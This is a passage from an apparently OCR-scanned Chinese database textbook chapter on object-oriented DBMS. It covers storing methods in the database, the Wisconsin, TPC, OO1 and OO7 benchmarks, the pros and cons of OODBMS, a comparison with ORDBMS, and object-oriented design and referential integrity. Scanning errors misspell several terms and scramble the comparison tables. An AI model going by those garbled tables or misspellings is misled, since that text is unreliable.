有 两 种 处 理 方法 的 策略 : 将 方法 存储 在 外 部 文件 中 ， 如 图 27-13a 所 示 ; 将 方法 存储 在 
数据 库 中 ， 如 图 27-13b 所 示 。 第 一 种 方法 类 似 于 传统 DBMS 中 的 函数 库 或 者 应 用 程序 编程 
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接口 (API)， 在 这 种 方法 中 ， 应 用 程序 通过 与 DBMS 供应 商 提供 的 函数 进行 链接 而 实现 与 
数据 库 的 交互 。 在 第 二 种 方法 中 ,方法 存储 在 数据 库 中 ， 在 运行 时 与 应 用 程序 进行 动态 绑 
定 。 第 二 种 方法 具有 许多 优点 : 





e ) 数据 库 服务 器 存储 
图 27-12 客户 -服务 器 体系 结构 


e 消除 宛 余 代 码 。 方 法 在 数据 库 中 只 存储 一 次 ， 而 不 是 在 每 一 个 需要 访问 数据 元 素 的 
程序 中 都 放置 一 个 处 理 该 数据 的 方法 的 副本 。 

e 简化 修改 。 对 方法 的 修改 只 需要 在 一 个 地 方 进行 一 次 。 所 有 的 程序 自动 地 调用 更 新 
以 后 的 方法 。 根 据 所 做 修改 的 性 质 ， 可 能 不 需要 对 程序 进行 重新 编译 、 测 试 以 及 重 
新 发 布 。 

@ 方法 更 加 安全 。 将 方法 存储 在 数据 库 中 可 以 使 其 完全 受益 于 OODBMS 本 身 提供 的 
安全 保护 机 制 。 

@ 方法 可 以 被 并 发 地 共享 。 同样 ， 并 发 访问 是 由 OODBMS 自动 提供 的 。 这 还 可 以 防 
止 多 个 用 户 对 一 个 方法 同时 进行 不 同 的 修改 。 

e 增强 完整 性 。 将 方法 存储 在 数据 库 中 意味 着 完整 性 约束 可 以 跨 所 有 的 应 用 程序 始终 
由 OODBMS 强制 实施 。 

GemStone 和 Itasca 这 两 个 产品 是 将 方法 存储 在 数据 库 中 并 从 数据 库 中 被 激活 。 





| 
a ) 将 方法 存储 在 数据 库 外 对 象 





方法 动态 地 与 应 用 程序 绑 定 
b ) 将 方法 存储 在 数据 库 内 
图 27-13 ”处 理 方 法 的 策略 
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27.4.5 ”基准 测试 


多 年 以 来 ， 人们 开发 了 各 种 各 样 的 数据 库 基 准 测试 作为 比较 各 种 DBMS 性 能 的 工具 ， 
在 各 种 学 术 、 技 术 和 商业 的 文章 报道 中 也 经 常 被 提 及 。 我 们 在 分 析 两 种 面向 对 象 的 基准 测试 
之 前 ， 先 给 出 一 些 背景 知识 。 对 这 些 基准 测试 的 详细 描述 超出 了 本 书 的 范围 ， 感 兴趣 的 读者 
可 以 参阅 Gray ( 1993 )。 
威斯康辛 (Wisconsin) 基准 测试 

可 能 最 早 的 DBMS 基准 测试 就 是 威斯康辛 基准 测试 ， 可 用 于 某 些 DBMS 特性 的 比较 
(Bitton 等 人 ，1983 )。 威 斯 康 辛 基准 测试 包含 了 一 组 对 单 用 户 可 能 执行 的 操作 的 测试 : 

e 更 新 和 删除 关键 和 非 关键 属性 。 

e 涉及 不 同 重 复 度 的 属性 的 投影 ， 具 有 不 同 选择 率 的 有 索引 、 无 索引 和 被 聚集 属性 的 

选择 。 

。 具有 不 同 选择 率 的 连接 。 

。 聚集 函数 。 

最 初 的 威斯康辛 基准 测试 是 基于 三 个 关系 的 : 一 个 关系 被 称 为 Onektup， 拥 有 1000 个 
元 组 ; 另外 两 个 分 别 被 称 为 Tenktupl 和 Tenktup2， 各 自 拥 有 10 000 个 元 组 。 该 基准 测试 通 
常情 况 下 都 很 有 有 用， 尽管 它 不 适合 高 偏 移 属性 分 布 ， 并 且 使 用 的 连接 查询 也 相对 比较 简单 。 

由 于 精确 的 基准 测试 信息 的 重要 性 ， 制 造 商 联盟 在 1988 年 组 成 了 事务 处 理 委 员 会 
( Transaction Processing Council，TPC)， 制 定 了 一 系列 基于 事务 的 测试 套件 ， 用 于 测度 数据 
库 /事务 处 理 环境 。 每 一 套件 都 包含 了 一 份 打印 的 规范 说 明 ， 并 附 ANSI C 源 代码 ， 用 它 可 
以 根据 预先 设 定 的 标准 结构 生成 含有 数据 记录 的 数据 库 。 

TPC-A 和 TPC-B 基准 测试 

TPC-A 和 TPC-B 基于 一 个 简单 的 银行 事务 。TPC-A 衡量 联机 事务 处 理 (OLTP) 的 性 能 ， 
覆盖 了 数据 库 服务 器 、 网 络 和 系统 的 其 他 组 成 部 分 所 使 用 的 时 间 ， 但 是 不 包括 对 用 户 界 面 的 
测试 。TPC-B 只 衡量 数据 库 服务 器 的 性 能 。 测 试 事务 对 资金 从 某 一 账户 转 进 或 转 出 进行 模 
拟 ， 包 含 下 列 动作 : 

e 更 新 账户 记录 (Account 关系 有 100 000 个 元 组 )。 

e 更 新 出 纳 员 记录 (Teller 关系 有 10 个 元 组 )。 

e 更 新 支行 记录 (Branch 关系 有 1 个 元 组 )。 

e 更 新 历史 记录 (History 关系 有 2 592 000 个 元 组 )。 

e 返回 账户 余额 。 

上 面 引用 的 基数 属于 最 小 配置 ， 数 据 库 的 规模 可 以 是 该 配置 的 许多 倍 。 因 为 这 些 操作 都 
是 在 单个 元 组 上 进行 的 ， 系 统 的 一 些 重要 方面 没有 得 到 测度 (例如 ， 查 询 规划 和 连接 操作 的 
执行 )。 

TPC-C 基准 测试 

TPC-A 和 TPC-B 已 经 很 少 使 用 ， 它 们 逐渐 被 TPC-C 取代 ，TPC-C 基于 一 个 订单 应 用 程 
序 。 底 层 数 据 库 模式 和 查询 范围 都 要 比 TPC-A 复杂 得 多 ， 从 而 提供 了 一 种 对 DBMS 性 能 更 
加 全 面 的 测试 手段 。TPC-C 定义 了 五 个 事务 ， 包 括 生成 新 订单 、 支 付 、 订 单 状 况 查询 、 定 单 
投 送 以 及 库存 水 平 查询 。 
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其 他 基准 测试 
事务 处 理 委员 会 还 定义 了 许多 其 他 的 基准 测试 ， 例 如 : 
e TPC-H。 针 对 即席 的 决策 支持 环境 ， 在 这 种 环境 里 ， 用 户 并 不 清楚 将 执行 哪些 查询 。 
- e TPC-R。 针 对 决策 支持 环境 中 的 商务 报表 业务 ， 用 户 对 数据 库 系统 运行 一 组 标准 的 查询 。 
e。 TPC-W。 一 个 针对 电子 商务 的 事务 型 的 Web 基准 测试 ， 工 作 负载 是 在 一 个 受 控 的 
Internet 商务 环境 中 执行 的 ， 以 模拟 面向 商务 的 事务 型 Web 服务 器 的 活动 。 
事务 处 理 委员 会 在 其 官方 网 站 上 (www.tpc.org) 发 布 这 些 基准 测试 的 结果 。 
O01 基准 测试 
对 象 操 作 版 本 1 (001) 基准 测试 虽 在 成 为 一 个 通用 的 OODBMS 性 能 的 测度 标准 
( Cattell 和 Skeen，1992 )。0O0O1 被 设计 为 能 够 再 现 那 些 在 9.1 节 讨 论 的 各 种 高 级 工程 应 用 中 
较为 常见 的 操作 ， 例 如 查找 与 某 一 随机 部 件 相 连 的 所 有 部 件 ， 然 后 继续 查找 与 这 些 部 件 中 的 
某 一 个 部 件 相连 的 所 有 部 件 ， 以 此 类 推 ， 查询 深度 可 达 7 级 。 基 准 测试 包括 : 
e 基于 主 关键 字 (部 件 编号 ) 随机 检索 1000 个 部 件 。 
e 100 个 新 部 件 的 随机 插入 操作 ， 随 机 选择 的 300 个 与 这 些 新 部 件 的 连接 ， 所 有 这 些 
操作 作为 一 个 事务 提交 。 
e 随机 部 件 展开 多 达 7 级 深 ,检索 多 达 3280 个 部 件 。 
1989 年 和 1990 年 ,， 001 基准 测试 对 GemStone、Ontos、ObjectStore、Objectivity/DB 
和 Versant 等 OODBMS 以 及 INGRES 和 Sybase 等 关系 DBMS 进行 了 测试 。 结 果 表 明 ， 与 
关系 DBMS 相 比 ，OODBMS 的 性 能 平均 提高 了 30 倍 。 对 该 基准 测试 的 最 主要 的 批评 在 于 ， 
对 象 连 接 的 方式 不 支持 簇 集 (任何 对 象 的 闭 包 都 是 整个 数据 库 )。 因 此 ， 那 些 牺牲 其 他 操作 
而 换取 了 好 的 导航 访问 性 能 的 系统 用 这 个 基准 测试 结果 都 不 错 。 
007 基准 测试 
1993 年 ， 美国 威斯康星 大 学 发 布 了 007 基准 测试 ，007 基准 测试 则 是 基于 一 个 更 加 全 
面 的 测试 集 和 一 个 更 加 复杂 的 数据 库 。007 被 设计 用 于 对 OODBMS 产品 进行 详细 的 比较 
( Carey 等 人 ，1993 )。007 模 拟 了 CAD/CAM 环境 ,专门 测试 在 对 象 到 对 象 的 导航 式 访问 
这 个 方面 系统 的 性 能 ， 涉 及 了 被 缓存 的 数据 、 驻 留 磁盘 的 数据 以 及 稀 朴 存储 和 稠密 存储 的 数 
据 。007 还 对 对 象 的 有 索引 更 新 和 无 索引 更 新 、 重 复 更 新 以 及 对 象 的 创建 和 删除 进行 测试 。 
007 数据 库 模 式 是 基于 一 种 复杂 的 部 件 层次 结构 的 ， 每 一 部 件 都 有 相关 的 文档 ， 模 块 
(位 于 层次 结构 最 顶层 的 对 象 ) 则 有 一 个 操作 手册 。 测 试 被 分 成 了 两 组 。 第 一 组 用 来 测试 : 
e 遍历 速度 (类似 于 001 的 导航 性 能 的 简单 测试 )。 
e 带 有 更 新 的 遍历 (类似 于 第 一 个 测试 ， 但 是 对 每 一 个 被 访问 的 原子 部 件 ， 即 合成 部 
件 的 组 成 部 分 ， 进 行 4 次 更 新 )。 
e 文档 中 列 出 的 其 他 操作 。 
第 二 组 包含 了 各 种 说 明 性 的 查询 ， 涉 及 精确 匹配 、 范 围 搜索 、 路 径 查 找 、 扫 描 、 对 
make 实例 程序 的 模拟 以 及 连接 操作 。 为 了 便于 使 用 ， 一些 实现 样 例 可 以 从 匿名 FTP 站 点 
ftp.cs.wisc.edu 下 载 。 


27.5 OODBMS 的 优点 和 缺点 
OODBMS 可 以 为 许多 种 高 级 数据 库 应 用 提供 适当 的 解决 方案 。 然 而 OODBMS 还 是 存 
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在 一 些 缺点 。 本 节 将 对 其 优 缺 点 进行 分 析 。 


27.5.1 优点 表 27-1 OODBMS 的 优点 
OODBMS 的 优点 如 表 27-1 所 示 。 增强 的 建 模 能 力 
增强 的 建 模 能 力 可 扩展 性 


面向 对 象 的 数据 模型 能 够 更 加 贴切 地 模拟 “现实 世界 " 。 消除 了 阻抗 失 配 
封装 了 状态 和 行为 的 对 象 是 现实 世界 对 象 更 加 自然 和 更 加 ”更 具 表达 力 的 查询 语言 
真实 的 表示 。 对 象 可 以 存储 它 与 所 有 其 他 对 象 的 联系 ， 包 ”支持 模式 演化 
含 多 对 多 联系 ， 并 且 多 个 对 象 还 可 以 构成 复杂 对 象 ， 而 复 ”支持 长 寿 事 务 
杂 对 象 对 于 传统 数据 模型 来 说 是 难于 处 理 的 对 象 。 适用 于 高 级 数据 库 应 用 
可 扩展 性 .提高 7 性 能 
OODBMS 允许 根据 已 有 的 数据 类 型 创建 新 的 数据 类 型 。OODBMS 具备 从 多 个 类 中 提取 
出 共有 的 特性 、 并 由 此 生成 可 以 被 子 类 共享 的 超 类 的 能 力 ， 这 种 能 力 能 够 大 大 降低 系统 的 元 
余 度 ， 正 如 本 章 开篇 所 述 ， 这 也 被 视 为 面向 对 象 技术 的 主要 优点 之 一 。 重 载 是 继承 的 一 个 重 
要 特性 ， 重 载 允许 特例 在 几乎 不 影响 系统 其 余部 分 的 情况 下 就 很 容易 地 被 处 理 。 进 而 ， 类 的 
可 重用 性 使 得 开发 速度 提高 ， 数 据 库 及 其 应 用 程序 更 易于 维护 。 

值得 一 提 的 是 ， 如 果 恰 当地 实现 域 ， 关 系 DBMS 可 以 具有 与 OODBMS 所 声称 的 相同 
的 功能 。 一 个 域 可 以 被 看 成 是 一 个 具有 封装 了 标量 值 的 、 具 有 任意 复杂 度 的 数据 类 型 ， 只 是 
该 数据 类 型 只 能 被 预定 义 的 函数 操作 。 因 此 ， 在 关系 模型 某 个 域 上 定义 的 属性 能 够 包含 任何 
类 型 例如， 图 形 、 文 档 、 图 像 、 数 组 等 ( Date，2000 )。 从 这 个 角度 看 ， 域 和 对 象 类 可 以 
说 是 同一 种 事物 。 我 们 将 在 附录 N.2 节 继续 讨论 这 个 问题 。 
消除 了 阻抗 失 配 

数据 操作 语言 (DML) 与 编程 语言 之 间 语 言 接口 的 单一 性 克服 了 阻抗 失 配 。 于 是 ， 在 把 
一 种 说 明 性 的 语言 (例如 SQL) 映射 为 一 种 命令 式 的 语言 (例如 C) 时 存在 的 低 效 性 将 不 复 
存在 。 另 可 发 现 ， 与 关系 DBMS 的 标准 语言 SQL 相 比 ， 大 部 分 OODBMS 都 能 提供 一 种 计 
算 上 完备 的 DML。 
更 具 表 达 力 的 查询 语言 

在 OODBMS 中 ， 从 一 个 对 象 到 下 一 个 对 象 的 导航 式 访问 是 一 种 最 常见 的 数据 访问 形 
式 。 这 与 SQL 的 连接 式 访 问 相 反 ( 即 基于 一 个 或 多 个 谓词 进行 选择 的 说 明 性 语句 )。 导 航 式 
访问 更 适 于 处 理 部 件 爆炸 、 递 归 查 询 等 。 然 而 ， 对 大 多 数 的 OODBMS 都 和 某 一 种 特定 的 编 
程 语言 绑 定 这 一 点 存 有 争议 ， 尽 管 对 程序 员 来 说 是 方便 的 ， 但 是 对 于 需要 说 明 性 语言 的 终端 
用 户 来 说 并 不 总 是 有 用 的 。 认 识 到 这 一 点 ，ODMG 标准 制定 了 一 种 基于 SQL 的 面向 对 象形 
式 的 说 明 性 查询 语言 。 
支持 模式 演化 

OODBMS 中 数据 和 应 用 程序 之 间 的 紧 耦 合 使 得 模式 演化 更 加 可 行 。 泛 化 和 继承 使 得 模 
式 具有 更 好 的 结构 、 更 加 直观 ， 并 且 能 够 捕获 更 多 的 应 用 程序 的 语义 。 
支持 长 寿 事务 

为 了 维护 数据 库 的 一 致 性 ， 现 有 的 关系 DBMS 均 强 化 了 并 发 事务 的 可 串 行 性 (参见 
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22.2.2 节 )。 一 些 OODBMS 使 用 不 同 的 协议 处 理 在 许多 高 级 数据 库 应 用 程序 中 都 很 常见 的 
长 寿 事务 。 这 是 一 个 有 争议 的 优点 : 正如 在 9.2 节 中 提 到 的 ， 并 不 存在 结构 上 的 原因 ， 关 系 
DBMS 为 何不 支持 这 种 事务 。 
适用 于 高 级 数据 库 应 用 

在 9.1 节 已 经 讨论 过 ， 传 统 的 DBMS 在 许多 应 用 领域 都 未 取得 成 功 ， 例 如 计算 机 
辅助 设计 (CAD)、 计 算 机 辅助 软件 工程 (CASE)、 办 公信 息 系 统 (OIS)、 多 媒体 系统 。 
OODBMS 增强 的 建 模 能 力 使 其 非常 适用 于 这 些 应 用 。 
提高 了 性 能 

正如 27.4.5 节 所 述 , 已 经 有 许多 基准 测试 表明 ， 较 之 关系 DBMS，OODBMS 的 性 能 
有 了 显著 的 提高 。 例 如 在 1989 年 和 1990 年 ，001 基准 测试 就 已 经 在 GemStone、Ontos、 
ObjectStore、ObjectivityDB 和 Versant 等 OODBMS 以 及 INGRES 和 Sybase 等 关系 DBMS 
上 运行 。 结 果 表 明 ，OODBMS 的 性 能 比 关系 DBMS 平均 提高 了 30 倍 。 尽 管 有 争议 说 ， 这 
种 性 能 上 的 区 别 是 由 于 所 采用 的 体系 结构 的 不 同 ， 而 不 是 所 采用 的 模型 的 不 同 。 然 而 ， 
OODBMS 中 的 动态 绑 定 和 无 用 单元 回收 功能 还 是 可 能 会 抵消 这 种 性 能 上 的 提高 。 

另 有 争议 说 ， 这 些 基 准 测试 是 针对 工程 应 用 的 ， 更 适合 于 面向 对 象 的 系统 。 相 对 地 , 在 
像 联 机 事务 处 理 (OLTP) 这 类 传统 的 数据 库 应 用 领域 里 ， 关 系 DBMS 要 优 于 OODBMS。 


27.52 缺点 R27 oopeus WA 
OODBMS 的 缺点 在 表 27-2 中 列 出 。 A 
缺乏 通用 数据 模型 rl 


正如 我 们 在 27.2 节 讨 论 的 那样 ，OODBMS 缺乏 一 竞争 激烈 
个 能 被 普遍 接受 的 数据 模型 ， 并 且 大 部 分 模型 缺乏 理论 ”查询 优化 与 封装 矛盾 
基础 。 这 一 点 被 视 为 OODBMS 的 一 个 大 障碍 ， 并 且 与 ”对 象 级 的 加 锁 会 影响 性 能 
先前 的 关系 系统 是 可 比较 的 。 尽 管 如 此 ，ODMG 业已 提 。 复杂 性 
出 了 一 个 对 象 模型 ,并且 该 模型 已 经 成 为 了 OODBMS ”缺少 对 视图 的 支持 
的 事实 标准 。 我 们 将 在 28.2 节 讨论 ODMG 的 对 象 模型 。 ”缺乏 安全 机 制 
经 验 不 足 

与 关系 DBMS 相 比 ，OODBMS 的 应 用 仍然 相对 有 限 。 这 就 意味 着 对 于 OODBMS ,我 
们 还 不 可 能 具有 与 传统 系统 一 样 的 经 验 水 平 。OODBMS 依然 面向 程序 员 ， 而 不 是 非 专业 的 
最 终 用 户 。 而 且 ， 设 计 和 管理 OODBMS 的 学 习 过 程 很 艰难 ， 这 也 导致 了 人 们 对 这 种 技术 的 
排斥 。 只 要 OODBMS 仍 被 局 限 在 一 个 小 的 市 场 环境 中 ， 这 个 问题 就 会 持续 存在 。 
缺乏 标准 

OODBMS 普遍 缺乏 标准 。 如 前 所 述 ， 还 没有 一 个 被 广泛 接受 的 数据 模型 。 同 样 ， 也 
没有 标准 的 面向 对 象 查询 语言 。ODMG 也 已 制定 了 一 个 对 象 查询 语言 (Object Query 
Language，OQL)，OQL 至 少 在 短期 内 作为 事实 标准 (参见 28.2.4 节 )。 标 准 的 缺乏 可 能 是 
导致 OODBMS 不 被 接受 的 最 主要 原因 。 
竞争 激烈 

也 许 OODBMS 供应 商 面临 的 主要 问题 之 一 就 是 来 自 RDBMS 以 及 脱颖而出 的 ORDBMS 
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产品 的 竞争 : 这 些 产品 已 经 具有 坚实 的 用 户 基础 ， 并 且 用 户 群 都 有 着 相当 丰富 的 使 用 经 验 ， 
SQL 是 得 到 了 公认 的 标准 ，ODBC 也 是 事实 上 的 标准 ， 关 系数 据 模型 具有 坚实 的 理论 基础 ， 
并 且 这 些 关系 的 产品 也 提供 了 许多 帮助 最 终 用 户 和 开发 人 员 的 支持 工具 。 
查询 优化 与 封装 矛盾 

查询 优化 需要 了 解 底层 实现 以 便 高 效 地 访问 数据 库 ， 但 这 与 封装 的 概念 相 了 矛盾。 虽然 
OODBMS 宣言 建议 这 是 可 以 接受 的 ， 然 而 ， 如 同 前 面 已 经 讨论 过 的 ， 这 似乎 会 产生 一 些 
问题 。 
对 象 级 的 加 锁 会 影响 性 能 

许多 OODBMS 将 锁 作 为 并 发 控制 协议 的 基础 。 然 而 ， 如 果 锁 作用 于 对 象 级 ， 对 继承 层 
次 的 加 锁 就 可 能 会 产生 问题 ， 同 时 也 会 影响 性 能 。 我 们 在 22.2.8 节 已 经 分 析 了 如 何 对 层次 
加 锁 。 
复杂 性 

OODBMS 提供 的 增强 功能 ， 例 如 单 级 存储 模型 、 指 针 切 换 、 长 寿 事务 、 版 本 管理 以 及 
模式 演化 ， 本 来 就 比 传 统 的 DBMS 要 复杂 得 多 。 一 般 情况 下 ， 复 杂 性 的 提高 会 使 得 产品 更 
加 昂贵 ， 并 且 更 难于 使 用 。 
缺少 对 视图 的 支持 

目前 ， 多 数 OODBMS 都 没有 提供 视图 机 制 ， 我 们 前 面 已 经 看 到 ， 视 图 机 制 能 够 带 来 许 
多 优点 ， 例 如 数据 独立 性 、 安 全 、 降 低 复杂 性 以 及 定制 化 ( 见 7.4 节 )。 
缺乏 安全 机 制 

目前 ，OODBMS 还 不 能 提供 足够 的 安全 机 制 。 大 部 分 安全 机 制 都 是 粗 粒 度 的 ， 用 户 无 
法 对 单个 对 象 或 类 的 访问 授权 。 如 果 OODBMS 要 想 完 全 扩展 到 商业 领域 中 ， 就 必须 改 掉 这 
个 缺点 。 


27.6 ORDBMS 与 OODBMS 的 比较 


最 后 我 们 将 对 象 -关系 DBMS 和 面向 对 象 DBMS 这 两 类 系统 做 一 个 简短 的 比较 。 为 了 
达到 比较 的 目的 ， 我 们 将 从 三 个 方面 来 分 析 : 数据 建 模 ( 表 27-3 )、 数 据 访 问 ( 表 27-4 )、 数 
据 共享 ( 表 27-5 )。 假 设 未 来 的 ORDBMS 与 SQL: 2011 兼容 。 


表 27-3 ORDBMS 和 OODBMS 数据 建 模 的 比较 


特 性 ORDBMS OODBMS 
对 象 标识 (OID) 通过 REF 类 型 支持 OID 支持 
封装 通过 UDT 支持 封装 支持 ， 但 是 可 以 为 查询 而 打破 封装 
继承 支持 (分离 的 UDT 和 表 的 层次 结构 ) | 支持 
多 态 性 支持 (基于 类 属 函 数 的 UDF 调用 ) ”| 在 面向 对 象 编程 建 模 语言 中 提供 支持 


复杂 对 象 通过 UDT 支持 复杂 对 象 支持 


支持 程度 好 ， 有 具有 用 户 自 定义 的 引 
用 完整 性 限制 


联系 支持 (例如 ， 使 用 类 库 ) 
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表 27-4 ORDBMS 和 OODBMS 数据 访问 的 比较 


创建 和 访问 持久 数据 支持 但 是 透明 度 随 产品 而 不 同 
即席 查询 设施 通过 ODMG 3.0 支持 

导航 式 访问 支持 程度 好 

对 象 服务 器 / 页 服务 器 支持 其 中 一 个 

模式 演化 支持 但 是 支持 程度 随 产品 而 不 同 


表 27-5 ORDBMS 和 OODBMS 数据 共享 的 比较 


支持 但 是 支持 程度 随 产品 而 不 同 
支持 但 是 支持 程度 随 产品 而 不 同 


27.7 面向 对 象 数据 库 设 计 


本 节 将 讨论 如 何 将 第 16 章 和 第 17 章 讲述 的 方法 学 用 于 OODBMS。 我 们 将 从 方法 学 的 
基础 ， 即 增强 的 实体 联系 模型 与 面向 对 象 的 主要 概念 之 比较 开始 讨论 。27.7.2 节 讨 论 对 象 之 
间 存 在 的 联系 以 及 如 何 处 理 引 用 完整 性 。 最 后 将 给 出 识别 方法 的 一 些 准则 。 


27.7.1 面向 对 象 数据 建 模 与 概念 数据 建 模 的 比较 


在 第 16 章 和 第 17 章 我 们 已 经 对 概念 数据 库 设 计 和 逻辑 数据 库 设 计 的 方法 学 进行 了 讨 
论 ， 该 方法 学 是 基于 增强 的 实体 联系 模型 (EER) 的 ， 并 且 与 面向 对 象 的 数据 建 模 ( Object- 
Oriented Data Modeling，OODM) 有 着 相似 之 处 。 表 27-6 将 OODM 与 概念 数据 建 模 
( Conceptual Data Modeling，CDM) 进行 了 比较 。 两 者 主要 的 区 别 在 于 : 对 象 里 既 封 装 了 状 
态 ， 也 封装 了 行为 ; 而 CDM 仅 捕 获 了 状态 ， 对 行为 却 一 无 所 知 。 因 而 ，CDM 没有 消息 的 
概念 ， 因 此 也 不 支持 封装 。 























OODBMS 
ACID 事务 


高 级 事务 模型 
安全 性 、 完 整 性 和 视图 








表 27-6 OODM 与 CDM 的 比较 


OODM CDM 区 别 
对 旬 对 象 包括 了 行为 

与 联系 相同 ,但 和 1 态 芯 
次 Ey 但 是 在 OODM 中 ， 继 承包 括 状态 的 继承 
消息 | ”| cpm 中 没有 相应 的 概念 
x E 
封装 | ”| cpM 中 没有 相应 的 概念 
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两 种 方法 的 相似 之 处 使 得 概念 数据 模型 和 逻辑 数据 模型 的 方法 学 〈 见 第 16 章 和 第 17 
章 ) 合情合理 地 成 为 了 面向 对 象 方法 学 的 基础 。 尽 管 该 方法 学 的 目标 主要 是 指导 关系 数据 库 
的 设计 , 但 是 这 个 模型 能 以 相对 简化 的 方式 映射 为 网 状 模型 和 层次 模型 。 生 成 的 逻辑 数据 模 
型 去 除了 多 对 多 联系 和 递归 联系 (步骤 2.1 )。 这 对 于 面向 对 象 建 模 来 说 没有 必要 ， 因 此 可 以 
省 略 ， 在 前 面 章节 之 所 以 引入 该 步骤 2.1 是 因为 传统 数据 模型 的 建 模 能 力 有 限 的 缘故 。 方 法 
学 中 用 到 的 规范 化 在 这 里 仍然 很 重要 ， 因 此 在 面向 对 象 的 数据 库 设 计 中 不 应 该 被 省 略 。 规 范 
化 被 用 于 模型 的 改进 ， 使 得 模型 能 够 满足 不 同 的 约束 以 避免 不 必要 的 数据 重复 。 处 理 对 象 并 
不 意味 着 可 以 元 余 。 在 面向 对 象 的 术语 中 ， 第 二 范式 和 第 三 范式 应 该 这 样 理解 : 

“对 象 的 每 一 个 属性 都 依赖 于 对 象 标识 ” 

面向 对 象 的 数据 库 设 计 要 求 数据 库 模 式 既 要 包括 对 象 数据 结构 与 约束 的 描述 ， 也 要 包括 对 象 
行为 的 描述 。 我 们 将 在 27.7.3 节 讨 论 行为 建 模 的 问题 。 


27.7.2 ”联系 和 引用 完整 性 


在 面向 对 象 的 数据 模型 中 ,联系 是 用 引用 属性 表示 的 ,通常 引用 属性 是 用 OID 实现 的 。 
在 第 16 章 和 第 17 章 提出 的 方法 学 中 ,我 们 将 所 有 的 非 二 元 联系 (例如 ， 三 元 联系 ) 分 解 
为 二 元 联系 。 本 节 将 讨论 如 何 根据 其 基数 是 一 对 一 (1:1 ) 的 、 一 对 多 的 ( 1:*) 和 多 对 多 的 
(*:#) 来 表示 二 元 联系 。 

1:1 联系 

对 象 A 和 B 之 间 的 1:1 联系 可 以 这 样 表示 : 为 对 象 A 增加 一 个 引用 属性 ， 为 了 维护 引 
用 完整 性 ， 还 要 在 对 象 B 中 也 增加 一 个 引用 属性 。 例 如 ， 在 Manager 和 Branch 之 间 存 在 
1:1 联系 ， 如 图 27-14 所 示 。 





图 27-14 Manager 和 Branch 之 间 的 1:1 联系 


1:* 联系 
对 象 A 和 B 之 间 的 1:* 联系 可 以 这 样 表示 : 在 对 象 B 中 增加 一 个 引用 属性 ， 在 对 

象 A 中 增加 一 个 包含 了 一 组 引用 的 属性 。 例 如 ， 图 27-15 中 表示 的 1:* 联系 ,一 个 存在 于 
Branch 和 SalesStaff 之 间 ， 男 一 个 则 位 于 SalesStaff 和 PropertyForRent 之 间 。 
*;* 联系 

对 象 A 和 B 之 间 的 *:* 联系 可 以 这 样 表示 : 分 别 在 对 象 A 和 B 中 增加 一 个 包含 了 一 组 
引用 的 属性 。 例 如 ， 在 Client 和 PropertyForRent 之 间 存 在 着 *:* 联系 ， 如 图 27-16 所 示 。 对 
于 关系 数据 库 的 设计 来 说 ， 可 以 将 *:* 联系 分 解 为 两 个 1:* 联系 ， 并 且 用 一 个 中 间 实 体 将 这 
两 个 1:* 联系 连接 起 来 。 在 OODBMS 中 也 可 以 这 样 处 理 ， 如 图 27-17 所 示 。 
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27-15 ”Branch 和 SalesStaff 以 及 SalesStaff 和 PropertyForRent 之 间 的 1:* 联系 





27-16 ”Client 和 PropertyForRent 之 间 的 *:* 联系 
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图 27-17 *:* 联 系 的 男 外 一 种 设计 方案 一 一 利用 中 间 类 表示 


引用 完整 性 
在 4.3.3 节 我 们 已 经 讨论 了 与 主 关 键 字 和 外 部 关键 字 相关 的 引用 完整 性 。 引 用 完整 性 要 
求 任 何 一 个 被 引用 的 对 象 必须 是 存在 的 。 例 如 ， 考 虑 Manager 和 Branch 之 间 的 1:1 的 联系 ， 
如 图 27-14 所 示 。Branch 的 实例 一 一 OID1， 引 用 了 一 个 Manager 实例 一 一 OID6。 如 果 用 户 
删除 了 这 个 Manager 实例 ， 却 没有 同时 更 新 Branch 实例 ， 则 破坏 了 引用 完整 性 。 处 理 引 用 
完整 性 的 技术 有 : 
@ 不 允许 用 户 显 式 地 删除 对 象 。 在 这 种 情况 下 ， 由 系统 负责 “垃圾 回收 ">， 即 当 对 象 不 
再 被 用 户 访问 时 ， 系 统 将 自动 删除 这 些 对 象 。GemStone 就 采用 这 种 方式 。 
@ 允许 用 户 删 除 那些 不 再 被 引用 的 对 象 。 在 这 种 情况 下 ， 系 统 可 以 自动 检测 到 无 效 的 
引用 并 将 其 置 为 NULL ( 空 指针 )， 或 者 不 允许 用 户 删除 。OODBMS 一 一 Versant 使 用 
这 种 方式 强制 实施 引用 完整 性 。 
@ 允许 用 户 在 对 象 和 联系 不 再 被 引用 时 ， 对 其 执行 修改 和 删除 操作 。 在 这 种 情况 下 ， 
系统 自动 地 (可 能 会 利用 反 向 属性 ) 对 对 象 的 完整 性 进行 维护 。 例 如 ， 在 图 27-14 
中 ， 从 Branch 到 Manager 有 一 个 联系 ， 另 外 ， 从 Manager 到 Branch 还 有 一 个 反问 
联系 。 当 Manager 对 象 被 删除 以 后 ， 系 统 很 容易 地 就 可 以 根据 反 向 联系 对 Branch 对 
象 里 的 引用 作出 相应 的 调整 。Ontos、Objectivity/DB 和 ObjectStore 等 OODBMS 和 
ODMG 的 对 象 模 型 一 样 ， 都 支持 这 种 类 型 的 完整 性 。 


27.7.3 行为 设计 
仅 靠 EER 方法 是 无 法 完成 面向 对 象 数据 库 设 计 的 全 部 内 容 的 。EER 方法 必须 还 要 支持 
能 够 标识 和 记录 每 一 类 对 象 的 行为 的 技术 。 这 就 需要 详细 分 析 企 业 需 求 的 处 理 过 程 。 例 如 ， 


传统 的 数据 流 方 法 使 用 的 是 数据 流 图 ( Data Flow Diagrams，DFD)， 因 此 对 系统 需求 处 理 过 
程 的 分 析 与 数据 模型 是 相互 分 离 的 。 而 在 面向 对 象 的 分 析 方 法 中 ， 需 求 的 处 理 过 程 被 映射 为 
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一 组 方法 ， 每 个 类 包含 的 方法 都 不 相同 。 对 用 户 或 者 其 他 对 象 可 见 的 方法 (公有 方法 ) 必须 要 与 
那些 仅 属于 类 的 内 部 的 方法 (私有 方法 ) 有 所 区 别 。 有 以 下 三 种 类 型 的 公有 方法 和 私有 方法 : 

e 构造 方法 和 析 构 方法 

.@ 访问 方法 

e 变换 方法 
构造 方法 和 析 构 方法 

构造 方法 可 以 生成 一 个 类 的 新 实例 ， 并 且 每 一 个 新 的 实例 都 被 赋予 了 一 个 唯一 的 OID。 
析 构 方法 则 负责 删除 那些 不 再 使 用 的 类 实例 。 在 某 些 系统 中 ， 析 构 是 一 个 自动 的 过 程 : 一 旦 
